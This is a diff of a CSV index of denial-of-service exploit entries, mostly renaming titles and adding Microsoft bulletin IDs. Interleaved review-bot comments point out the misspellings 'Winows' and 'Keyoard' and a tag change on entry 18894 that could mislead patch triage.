 40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80
@@ -2073,7 +2073,7 @@ id,file,description,date,author,platform,type,port
 18112,platforms/windows/dos/18112.txt,"optima apiftp server 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0
 18116,platforms/multiple/dos/18116.html,"Mozilla Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0
 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service",2011-11-18,hellok,windows,dos,0
-18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0
+18140,platforms/windows/dos/18140.c,"Microsoft Winows 7 - Keyoard Layout Blue Screen of Death (MS10-073)",2011-11-21,instruder,windows,dos,0
 18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0
 18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0
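Review bot: The rewritten title for entry 18140 contains two misspellings: `Winows` is carried over from the old title and `Keyoard` is new. This index is searched by product and component name, so the entry will not be returned for "Windows 7" or "Keyboard Layout" and is easy to miss when checking what affects a host. Suggested title: `"Microsoft Windows 7 - Keyboard Layout Blue Screen of Death (MS10-073)"`.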
@@ -2094,7 +2094,7 @@ id,file,description,date,author,platform,type,port
 18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0
 18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
 18272,platforms/windows/dos/18272.py,"Microsoft Windows Explorer - Denial of Service",2011-12-24,Level,windows,dos,0
-18275,platforms/win_x86-64/dos/18275.txt,"Apple Safari - GdiDrawStream BSoD",2011-12-18,webDEViL,win_x86-64,dos,0
+18275,platforms/win_x86-64/dos/18275.txt,"Apple Safari - GdiDrawStream Blue Screen of Death",2011-12-18,webDEViL,win_x86-64,dos,0
 18278,platforms/linux/dos/18278.txt,"Nagios Plugins check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos,0
 18285,platforms/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - (libav) 'libavcodec_plugin.dll' Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0
 18295,platforms/linux/dos/18295.txt,"lighttpd - Denial of Service (PoC)",2011-12-31,pi3,linux,dos,0
@@ -2127,7 +2127,7 @@ id,file,description,date,author,platform,type,port
 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",windows,dos,0
 18463,platforms/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",windows,dos,0
 18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0
-18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - BSOD Exploit",2012-02-09,shinnai,windows,dos,0
+18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - Blue Screen of Death Exploit",2012-02-09,shinnai,windows,dos,0
 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0
 18488,platforms/windows/dos/18488.txt,"Novell Groupwise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300
 18489,platforms/windows/dos/18489.txt,"Novell Groupwise Messenger 2.1.0 - Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300
@@ -2178,7 +2178,7 @@ id,file,description,date,author,platform,type,port
 18765,platforms/windows/dos/18765.txt,"Samsung NET-i ware 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0
 18774,platforms/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 - Buffer Overflow",2012-04-23,shinnai,windows,dos,0
 18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0
-18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter - Integer Overflow",2012-04-24,"Akita Software Security",windows,dos,0
+18777,platforms/windows/dos/18777.txt,"Microsoft .NET Framework EncoderParameter - Integer Overflow (MS12-025)",2012-04-24,"Akita Software Security",windows,dos,0
 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0
 18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - '.mp4' Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0
 18816,platforms/windows/dos/18816.py,"LAN Messenger 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",windows,dos,0
@@ -2194,7 +2194,7 @@ id,file,description,date,author,platform,type,port
 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0
 18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0
 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0
-18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034)",2012-05-18,Cr4sh,windows,dos,0
+18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0
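Review bot: Dropping `Post` from the tag on entry 18894 changes what the title says, not just how it is formatted. The old wording `(Post MS12-034)` presumably meant the issue remains after that bulletin is applied, whereas a plain `(MS12-034)` reads like the other tags in this file, i.e. the bulletin that fixes it. Someone triaging by bulletin could then treat hosts with MS12-034 installed as not affected. Unless the source advisory shows that MS12-034 is the fix, I would keep the original `(Post MS12-034)`.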
@@ -2343,7 +2343,7 @@ id,file,description,date,author,platform,type,port
 19760,platforms/windows/dos/19760.txt,"Pragma Systems InterAccess TelnetD Server 4.0 - Terminal Configuration",2000-02-24,"Ussr Labs",windows,dos,0
 19766,platforms/hardware/dos/19766.txt,"Nortel Networks Nautica Marlin - Denial of Service",2000-02-25,"Christophe GRENIER",hardware,dos,0
 19772,platforms/windows/dos/19772.txt,"WaveSurfer 1.8.8p4 - Memory Corruption (PoC)",2012-07-12,"Jean Pascal Pereira",windows,dos,0
-19777,platforms/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0
+19777,platforms/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)",2012-07-12,"Adi Cohen",windows,dos,0
 19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - Denial of Service",2000-02-26,"Jeff Stevens",multiple,dos,0
 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - Denial of Service",2000-02-28,"Jon Hittner",windows,dos,0
 19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request",1999-08-25,"ISS X-Force",windows,dos,0
@@ -2383,7 +2383,7 @@ id,file,description,date,author,platform,type,port
 19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver - Denial of Service",2000-05-18,"Chris Evans",linux,dos,0
 19961,platforms/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0
 19962,platforms/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0
-19974,platforms/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - Denial of Service",2000-05-31,"Kit Knox",windows,dos,0
+19974,platforms/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038)",2000-05-31,"Kit Knox",windows,dos,0
 19977,platforms/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta - view-source Denial of Service",2000-06-01,"Ussr Labs",multiple,dos,0
 19982,platforms/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0 / NetBSD 1.4.1/1.4.2 / OpenBSD 2.x - Denial of Service",2000-06-01,"Ussr Labs",bsd,dos,0
 19984,platforms/multiple/dos/19984.c,"Eterm 0.8.10 / rxvt 2.6.1 / PuTTY 0.48 / X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",multiple,dos,0
@@ -2393,7 +2393,7 @@ id,file,description,date,author,platform,type,port
 19994,platforms/windows/dos/19994.c,"Check Point Software Firewall-1 4.0/1 4.1 - Fragmented Packets Denial of Service",2000-05-23,phonix,windows,dos,0
 19996,platforms/multiple/dos/19996.txt,"ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service",2000-06-07,"Stuart McClure",multiple,dos,0
 20005,platforms/windows/dos/20005.c,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (1)",2000-06-08,"Renaud Deraison",windows,dos,0
-20006,platforms/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2)",2000-06-08,"Renaud Deraison",windows,dos,0
+20006,platforms/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (MS00-040) (2)",2000-06-08,"Renaud Deraison",windows,dos,0
 20015,platforms/windows/dos/20015.txt,"AnalogX SimpleServer:WWW 1.0.5 - Denial of Service",2000-07-15,"Ussr Labs",windows,dos,0
 20016,platforms/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple Denial of Service",2000-06-16,Prizm,windows,dos,0
 20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0
@@ -2431,7 +2431,7 @@ id,file,description,date,author,platform,type,port
 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos,0
 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",windows,dos,0
 20239,platforms/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP Denial of Service",2000-09-26,DCIST,multiple,dos,0
-20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0
+20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070)",2000-10-03,"BindView's Razor Team",windows,dos,0
 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 - LPC Zone Memory Depletion Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0
 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x - Pending ARP Request Remote Denial of Service",2000-10-05,skyper,openbsd,dos,0
 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 / UnityMail 2.0 - MIME Header Denial of Service",1998-08-02,L.Facq,windows,dos,0
@@ -2530,7 +2530,7 @@ id,file,description,date,author,platform,type,port
 20834,platforms/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service",2001-05-07,nemesystm,windows,dos,0
 20844,platforms/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote Denial of Service",2001-05-10,"Jass Seljamaa",osx,dos,0
 20845,platforms/osx/dos/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev - Remote Denial of Service",2001-05-15,"Jass Seljamaa",osx,dos,0
-20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 - FTP Denial of Service",2000-05-14,"Nelson Bunker",windows,dos,0
+20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 - FTP Denial of Service (MS01-026)",2000-05-14,"Nelson Bunker",windows,dos,0
 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router Denial of Service",2001-09-21,Sniffer,hardware,dos,0
 20852,platforms/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (1)",2001-05-15,"Santi Claus",multiple,dos,0
 20853,platforms/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos,0
@@ -2920,7 +2920,7 @@ id,file,description,date,author,platform,type,port
 22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - CGI2Perl.NLM Buffer Overflow",2003-07-23,"Uffe Nielsen",netware,dos,0
 22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",hardware,dos,0
 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0
-22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service",2003-07-23,refdom,windows,dos,0
+22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031)",2003-07-23,refdom,windows,dos,0
 22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - Malformed HTTP GET Denial of Service",2003-07-28,blackangels,hardware,dos,0
 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow",2003-07-16,kf,unix,dos,0
 22920,platforms/unix/dos/22920.txt,"IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow",2003-07-16,kf,unix,dos,0
@@ -3038,7 +3038,7 @@ id,file,description,date,author,platform,type,port
 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos,0
 23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0
 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos,0
-23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp CHM File Execution",2003-12-30,"Arman Nayyeri",windows,dos,0
+23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004)",2003-12-30,"Arman Nayyeri",windows,dos,0
 23505,platforms/osx/dos/23505.c,"Apple Mac OSX 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0
 23506,platforms/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",windows,dos,0
 23508,platforms/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 - Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",hardware,dos,0
@@ -3421,7 +3421,7 @@ id,file,description,date,author,platform,type,port
 26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0
 26336,platforms/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
 26340,platforms/linux/dos/26340.c,"Up-IMAPProxy 1.2.3/1.2.4 - Multiple Unspecified Remote Format String Vulnerabilities",2005-10-10,"Steve Kemp",linux,dos,0
-26341,platforms/windows/dos/26341.txt,"Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service",2005-10-11,anonymous,windows,dos,0
+26341,platforms/windows/dos/26341.txt,"Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)",2005-10-11,anonymous,windows,dos,0
 26342,platforms/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",linux,dos,0
 26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service",2005-10-20,"Rémi Denis-Courmont",linux,dos,0
 26413,platforms/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption (PoC)",2013-06-24,"Debasish Mandal",windows,dos,0
@@ -3457,7 +3457,7 @@ id,file,description,date,author,platform,type,port
 26833,platforms/hardware/dos/26833.txt,"Multiple Unspecified Cisco Catalyst Switches - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0
 26834,platforms/hardware/dos/26834.txt,"Westell Versalink 327W - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0
 26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0
-26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities",2005-12-19,ad@heapoverflow.com,windows,dos,0
+26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012)",2005-12-19,ad@heapoverflow.com,windows,dos,0
 26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - Denial of Service (PoC)",2013-07-16,kingcope,linux,dos,0
 26887,platforms/linux/dos/26887.rb,"rpcbind - (CALLIT procedure) UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos,0
 26891,platforms/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos,0
@@ -3474,7 +3474,7 @@ id,file,description,date,author,platform,type,port
 27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600
 27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - '.awd' Buffer Overflow",2013-07-23,"Core Security",windows,dos,0
 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - '.pct' Buffer Overflow",2013-07-23,"Core Security",windows,dos,0
-27050,platforms/windows/dos/27050.txt,"DirectShow - Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0
+27050,platforms/windows/dos/27050.txt,"Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0
 27051,platforms/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0
 27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
 27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer JPEG/PICT File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0
@@ -3970,7 +3970,7 @@ id,file,description,date,author,platform,type,port
 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
 31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
-31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (1)",2008-04-08,Whitecell,windows,dos,0
+31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)",2008-04-08,Whitecell,windows,dos,0
 31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos,0
 31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",windows,dos,0
 31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0
@@ -4475,7 +4475,7 @@ id,file,description,date,author,platform,type,port
 36267,platforms/linux/dos/36267.c,"Linux Kernel 3.15.6 - PPP-over-L2TP Socket Level Handling Crash (PoC)",2015-03-04,"Emeric Nasi",linux,dos,0
 36268,platforms/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash (PoC)",2015-03-04,"Emeric Nasi",linux,dos,0
 36271,platforms/osx/dos/36271.py,"Apple Mac OSX 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos,0
-36285,platforms/windows/dos/36285.c,"Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow",2011-11-08,anonymous,windows,dos,0
+36285,platforms/windows/dos/36285.c,"Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)",2011-11-08,anonymous,windows,dos,0
 36288,platforms/multiple/dos/36288.php,"Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0
 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0
 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",hardware,dos,0
@@ -4668,7 +4668,7 @@ id,file,description,date,author,platform,type,port
 37920,platforms/windows/dos/37920.txt,"Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to - Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0
 37921,platforms/windows/dos/37921.txt,"Microsoft Windows - 'ATMFD.dll' CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
 37922,platforms/windows/dos/37922.txt,"Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
-37923,platforms/windows/dos/37923.txt,"Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0
+37923,platforms/windows/dos/37923.txt,"Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads (MS15-021)",2015-08-21,"Google Security Research",windows,dos,0
 37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0
 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash (PoC)",2015-08-24,"Shankar Damodaran",windows,dos,25
 37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - '.gas' Crash (PoC)",2015-08-24,Un_N0n,windows,dos,0
@@ -4812,7 +4812,7 @@ id,file,description,date,author,platform,type,port
 38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0
 38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0
 38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash (PoC)",2015-11-19,"Vivek Mahajan",windows,dos,0
-38763,platforms/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0
+38763,platforms/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0
 38771,platforms/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0
 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service",2013-09-23,anonymous,linux,dos,0
 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0
@@ -4833,7 +4833,7 @@ id,file,description,date,author,platform,type,port
 38916,platforms/windows/dos/38916.html,"Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0
 38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0
 38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0
-38931,platforms/multiple/dos/38931.txt,"Avast! - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0
+38931,platforms/multiple/dos/38931.txt,"Avast! - Out-of-Bounds Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0
 38932,platforms/multiple/dos/38932.txt,"Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
 38933,platforms/multiple/dos/38933.txt,"Avast! - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0
 38934,platforms/windows/dos/38934.txt,"Avast! - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0
@@ -4922,7 +4922,7 @@ id,file,description,date,author,platform,type,port
 39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0
 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
 39232,platforms/windows/dos/39232.txt,"Microsoft Windows = devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
-39233,platforms/windows/dos/39233.txt,"Microsoft Office - COM Object DLL Planting with 'WMALFXGFXDSP.dll' (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
+39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash (PoC)",2016-01-15,"Abraham Espinosa",windows,dos,0
 39371,platforms/osx/dos/39371.c,"Apple Mac OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0
 39372,platforms/osx/dos/39372.c,"Apple Mac OSX - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0
@@ -5142,7 +5142,7 @@ id,file,description,date,author,platform,type,port
 39924,platforms/osx/dos/39924.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0
 39925,platforms/osx/dos/39925.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0
 39926,platforms/osx/dos/39926.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0
-39927,platforms/osx/dos/39927.c,"Apple Mac OSX Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0
+39927,platforms/osx/dos/39927.c,"Apple Mac OSX Kernel - Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0
